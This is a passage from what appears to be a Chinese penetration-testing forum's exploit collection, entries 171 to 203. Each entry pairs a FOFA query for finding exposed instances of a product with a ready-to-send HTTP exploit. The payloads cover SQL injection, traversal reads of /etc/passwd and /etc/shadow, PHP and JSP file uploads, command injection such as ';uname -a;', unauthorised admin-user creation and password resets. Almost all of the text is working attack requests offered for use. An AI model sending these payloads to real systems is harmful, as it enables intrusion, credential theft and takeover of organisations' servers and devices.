User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. Esafenet (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}


193. Hillstone Networks (山石网科) Yunjian (云鉴) Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. FE (飞企互联) Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. Feiyuxing (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. Zhejiang University Enter (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit CMS assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. Founder (方正) Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. WeEngine (微擎) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea Cloud (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2